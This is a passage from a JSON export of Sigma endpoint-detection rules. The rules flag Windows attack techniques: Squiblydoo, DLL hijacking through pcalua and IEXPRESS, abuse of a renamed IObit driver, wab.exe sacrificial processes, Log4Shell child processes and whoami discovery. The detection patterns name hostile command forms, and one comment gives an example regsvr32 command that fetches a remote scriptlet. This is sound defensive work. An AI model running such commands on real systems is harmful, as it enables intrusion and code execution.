"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.615428Z",
"creation_date": "2026-03-23T11:45:34.615432Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.615439Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://car.mitre.org/analytics/CAR-2019-04-003/",
"https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo",
"https://github.com/cobbr/Covenant",
"https://attack.mitre.org/techniques/T1218/010/",
"https://lolbas-project.github.io/lolbas/Libraries/Scrobj/",
"https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"
],
"name": "t1218_010_squiblydoo.yml",
"content": "title: Possible Squiblydoo Attack Detected\nid: 09718066-8257-4dd4-83e0-14787bbc9fd3\ndescription: |\n Detects a suspicious invocation of `scrobj.dll` by `regsvr32.exe` (both lolbins), a technique also known as Squiblydoo.\n Attackers can used this technique to proxy execution of malicious code.\n This can be a sign of Covenant Regsvr32 launcher exploitation.\n Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\n It is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the regsvr32 process.\nreferences:\n - https://car.mitre.org/analytics/CAR-2019-04-003/\n - https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo\n - https://github.com/cobbr/Covenant\n - https://attack.mitre.org/techniques/T1218/010/\n - https://lolbas-project.github.io/lolbas/Libraries/Scrobj/\n - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\ndate: 2021/02/10\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.010\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Scrobj\n - classification.Windows.LOLBin.Regsvr32\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # regsvr32 /s /u /n /i:http://xxx.xxx.xxxx.xxx:9998/19jSi scrobj\n selection_1:\n - Image|endswith: '\\regsvr32.exe'\n - OriginalFileName: 'REGSVR32.EXE'\n selection_2:\n CommandLine|contains: 'scrobj'\n\n exclusion_scrobj:\n CommandLine:\n - '?:\\windows\\system32\\regsvr32.exe ?:\\windows\\system32\\scrobj.dll /s'\n - '?:\\WINDOWS\\SysWoW64\\regsvr32.exe ?:\\WINDOWS\\SysWoW64\\scrobj.dll /s'\n - 'regsvr32.exe /s ?:\\Windows??system32\\scrobj.dll'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "09718066-8257-4dd4-83e0-14787bbc9fd3",
"rule_name": "Possible Squiblydoo Attack Detected",
"rule_description": "Detects a suspicious invocation of `scrobj.dll` by `regsvr32.exe` (both lolbins), a technique also known as Squiblydoo.\nAttackers can used this technique to proxy execution of malicious code.\nThis can be a sign of Covenant Regsvr32 launcher exploitation.\nCovenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\nIt is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the regsvr32 process.\n",
"rule_creation_date": "2021-02-10",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "098502c3-27e1-4c6f-a53e-8fa8f3dd549f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594813Z",
"creation_date": "2026-03-23T11:45:34.594816Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594824Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pcalua.yml",
"content": "title: DLL Hijacking via pcalua.exe\nid: 098502c3-27e1-4c6f-a53e-8fa8f3dd549f\ndescription: |\n Detects potential Windows DLL Hijacking via pcalua.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pcalua.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\pcaui.dll'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "098502c3-27e1-4c6f-a53e-8fa8f3dd549f",
"rule_name": "DLL Hijacking via pcalua.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pcalua.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "09c303fe-d535-4d15-9f45-17f91b3e39fc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627557Z",
"creation_date": "2026-03-23T11:45:34.627559Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627563Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.reliaquest.com/blog/double-extortion-attack-analysis/",
"https://www.iobit.com/fr/iobit-unlocker.php",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_execution_of_renamed_iobitunlocker_driver.yml",
"content": "title: Renamed IObit Unlocker Driver Loaded\nid: 09c303fe-d535-4d15-9f45-17f91b3e39fc\ndescription: |\n Detects the loading of a renamed IObit Unlocker driver. IObit Unlocker is a utility used to remove files locked by the system.\n This driver driver has been abused by adversaries to disable security tools and evade detection.\n It is recommended to analyze the host for other suspicious activities and to isolate it if needed.\nreferences:\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://www.iobit.com/fr/iobit-unlocker.php\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/09/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Tool.IoBitUnlocker\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.VulnerableDriver\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection:\n OriginalFileName: 'IObitUnlocker.sys'\n\n # This is handled by the rule 79f2b027-0261-441e-a1d1-d569515a7c9b\n filter_image:\n ImageLoaded|endswith: '\\IObitUnlocker.sys'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "09c303fe-d535-4d15-9f45-17f91b3e39fc",
"rule_name": "Renamed IObit Unlocker Driver Loaded",
"rule_description": "Detects the loading of a renamed IObit Unlocker driver. IObit Unlocker is a utility used to remove files locked by the system.\nThis driver driver has been abused by adversaries to disable security tools and evade detection.\nIt is recommended to analyze the host for other suspicious activities and to isolate it if needed.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "09e88047-86aa-4e82-a0bb-4d8613732d6a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616726Z",
"creation_date": "2026-03-23T11:45:34.616729Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616737Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_wab.yml",
"content": "title: Wab.exe Sacrificial Process Spawned\nid: 09e88047-86aa-4e82-a0bb-4d8613732d6a\ndescription: |\n Detects the suspicious execution of the legitimate wab.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by GuLoader, an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\n It is recommended to investigate the parent process performing this action and the destination IP address of wab.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/22\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Program Files\\Windows Mail\\wab.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "09e88047-86aa-4e82-a0bb-4d8613732d6a",
"rule_name": "Wab.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate wab.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by GuLoader, an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\nIt is recommended to investigate the parent process performing this action and the destination IP address of wab.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-03-22",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "09f74bd7-74d5-4ebb-bdda-430f8cf9a81f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073376Z",
"creation_date": "2026-03-23T11:45:34.073377Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073382Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/",
"https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/",
"https://attack.mitre.org/versions/v10/techniques/T1190/"
],
"name": "t1190_log4j_vulnerability_exploitation.yml",
"content": "title: Suspicious Process Spawned by Java Application\nid: 09f74bd7-74d5-4ebb-bdda-430f8cf9a81f\ndescription: |\n Detects a potential exploitation of the Apache Java Logging Library Log4j Vulnerability aka Log4Shell (CVE-2021-44228).\n This critical vulnerability is a remote code execution (RCE) in the Apache Java logging library Log4j, actively exploited, that allows an attacker to gain full control of the affected servers.\n It is recommended to analyze the processes executed by the Java process to look for malicious actions and to determine whether the Java application is running a vulnerable version of Log4j.\nreferences:\n - https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/\n - https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/\n - https://attack.mitre.org/versions/v10/techniques/T1190/\ndate: 2021/12/20\nmodified: 2025/05/27\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.Java\n - classification.Windows.Exploit.Log4Shell\n - classification.Windows.Exploit.CVE-2021-44228\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ParentImage|endswith:\n - '\\java.exe'\n - '\\javaw.exe'\n - '\\jp2launcher.exe'\n - ParentImage|endswith: '\\cmd.exe'\n GrandparentImage|endswith:\n - '\\java.exe'\n - '\\javaw.exe'\n - '\\jp2launcher.exe'\n\n selection_powershell:\n Image|endswith: '\\powershell.exe'\n CommandLine|contains:\n - 'iex'\n - 'invoke-expression'\n - 'Start-Process'\n - 'New-Object -ComObject'\n - '*^*^*^*'\n\n selection_msiexec:\n Image|endswith: '\\msiexec.exe'\n CommandLine|contains: 'http'\n\n selection_mshta:\n Image|endswith: '\\mshta.exe'\n CommandLine|contains: 'http'\n\n selection_regsvr32:\n Image|endswith: '\\regsvr32.exe'\n CommandLine|contains: 'http'\n\n selection_rundll32:\n Image|endswith: '\\rundll32.exe'\n CommandLine|contains|all:\n - 'RunHTMLApplication'\n - 'mshtml'\n\n selection_hh:\n Image|endswith: '\\hh.exe'\n CommandLine|contains: 'http'\n\n selection_schtasks:\n Image|endswith: '\\schtasks.exe'\n CommandLine|contains: '/create'\n\n exclusion_commandline:\n CommandLine|contains:\n - 'powershell.exe -Command & {Start-Process -FilePath `\"?:\\KineQuantum\\steamvrredist\\bin\\'\n - 'powershell.exe -Command Start-Process ??:\\Program Files\\'\n - 'powershell.exe -Command Start-Process ??:\\Program Files (x86)\\'\n - '/tr ?:\\Apple\\Local\\Library\\WebObjects\\Applications\\'\n - '/tr ??:\\Program Files\\'\n - '/tr ??:\\Program Files (x86)\\'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nfalsepositives:\n - Some Java applications may spawn a legitimate process.\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "09f74bd7-74d5-4ebb-bdda-430f8cf9a81f",
"rule_name": "Suspicious Process Spawned by Java Application",
"rule_description": "Detects a potential exploitation of the Apache Java Logging Library Log4j Vulnerability aka Log4Shell (CVE-2021-44228).\nThis critical vulnerability is a remote code execution (RCE) in the Apache Java logging library Log4j, actively exploited, that allows an attacker to gain full control of the affected servers.\nIt is recommended to analyze the processes executed by the Java process to look for malicious actions and to determine whether the Java application is running a vulnerable version of Log4j.\n",
"rule_creation_date": "2021-12-20",
"rule_modified_date": "2025-05-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0a3934f6-2b4c-4fb0-81ea-2601e7665b3a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622840Z",
"creation_date": "2026-03-23T11:45:34.622842Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622846Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_whoami_windows.yml",
"content": "title: Current Username Discovered via Whoami (Windows)\nid: 0a3934f6-2b4c-4fb0-81ea-2601e7665b3a\ndescription: |\n Detects the execution of whoami.exe.\n This command is often used by attackers during the discovery phase to discover their user ID, permissions and groups.\n It is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\ndate: 2021/03/15\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n # whoami /groups\n - attack.t1069\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\whoami.exe'\n # Renamed binaries\n - OriginalFileName: 'whoami.exe'\n\n selection_commandline:\n CommandLine:\n - 'whoami'\n - 'whoami ?all'\n - 'whoami ?priv'\n - 'whoami ?groups'\n - 'whoami.exe'\n - 'whoami.exe ?all'\n - 'whoami.exe ?priv'\n - 'whoami.exe ?groups'\n ParentImage|contains: '?'\n\n # This is handled by the rule 77575317-f87a-49a1-b295-f2a7a23f75d4\n filter_system:\n IntegrityLevel: 'System'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_grandparentimage:\n GrandparentImage|endswith:\n # IBM i Access Client Solutions\n - '\\Start_Programs\\Windows_i386-32\\acslaunch_win-32.exe'\n - '\\Start_Programs\\Windows_x86-64\\acslaunch_win-64.exe'\n - '\\ArcGIS\\Portal\\framework\\service\\bin\\ArcGISPortal.exe'\n - '\\ArcGIS\\Portal\\framework\\runtime\\jre\\bin\\javaw.exe'\n - '\\ArcGIS_Portal\\Portal\\framework\\service\\bin\\ArcGISPortal.exe'\n - '\\ArcGIS_Portal\\Portal\\framework\\runtime\\jre\\bin\\javaw.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ccmcache:\n CurrentDirectory|startswith: '?:\\Windows\\ccmcache\\'\n\n exclusion_msys2:\n Image: '?:\\msys64\\usr\\bin\\whoami.exe'\n ParentImage:\n - '?:\\msys64\\usr\\bin\\bash.exe'\n - '?:\\msys64\\usr\\bin\\sh.exe'\n\n exclusion_ms_monitoring_agent:\n # grandparent: C:\\Windows\\system32\\cscript.exe /nologo ApplicationPartitionDiscovery.vbs 0 {B87E55DB-EA55-993D-FA42-5A4B215D0593} {59E3FB68-8F43-D96C-1EF9-EE090EDDD8E6} false xxx_domain_name_xxx yyyyy 11001 21001\n GrandparentCommandLine|startswith: '?:\\Windows\\system32\\cscript.exe /nologo ApplicationPartitionDiscovery.vbs '\n CurrentDirectory|startswith: '?:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State'\n\n exclusion_palo_alto:\n # C:\\windows\\system32\\cmd.exe /S /C chcp 437>nul 2>&1 & C:\\windows\\System32\\whoami.exe /groups\n # but for whatever reason, we don't have the grandparentinfo (PanGpHip.exe)\n CommandLine: '?:\\windows\\System32\\whoami.exe /groups' # 1 space before /groups\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /S /C chcp 437>nul 2>&1 & ?:\\windows\\System32\\whoami.exe /groups' # 2 spaces before /groups\n\n exclusion_podman:\n GrandparentImage|endswith: '\\Podman Desktop.exe'\n ParentCommandLine: 'powershell.exe $null -ne (whoami /groups /fo csv | ConvertFrom-Csv | Where-Object {$_.SID -eq \"S-1-5-32-544\"})'\n\n exclusion_cygwin:\n Image|endswith: '\\cygwin64\\bin\\whoami.exe'\n ParentImage|endswith: '\\cygwin64\\bin\\bash.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '\\postgresql-*.*-*-windows-x64.exe|'\n - '|?:\\VTOM\\ABM\\BIN\\bdaemon.exe|'\n - '|?:\\Program Files (x86)\\F5 VPN\\f5fpclientW.exe|'\n\n exclusion_schedule:\n GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0a3934f6-2b4c-4fb0-81ea-2601e7665b3a",
"rule_name": "Current Username Discovered via Whoami (Windows)",
"rule_description": "Detects the execution of whoami.exe.\nThis command is often used by attackers during the discovery phase to discover their user ID, permissions and groups.\nIt is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\n",
"rule_creation_date": "2021-03-15",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1069"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0a4830e7-82c9-4ac1-b846-a68dc4caa7ab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098031Z",
"creation_date": "2026-03-23T11:45:34.098033Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098037Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iexpress.yml",
"content": "title: DLL Hijacking via IEXPRESS.exe\nid: 0a4830e7-82c9-4ac1-b846-a68dc4caa7ab\ndescription: |\n Detects potential Windows DLL Hijacking via IEXPRESS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'IEXPRESS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0a4830e7-82c9-4ac1-b846-a68dc4caa7ab",
"rule_name": "DLL Hijacking via IEXPRESS.exe",
"rule_description": "Detects potential Windows DLL Hijacking via IEXPRESS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
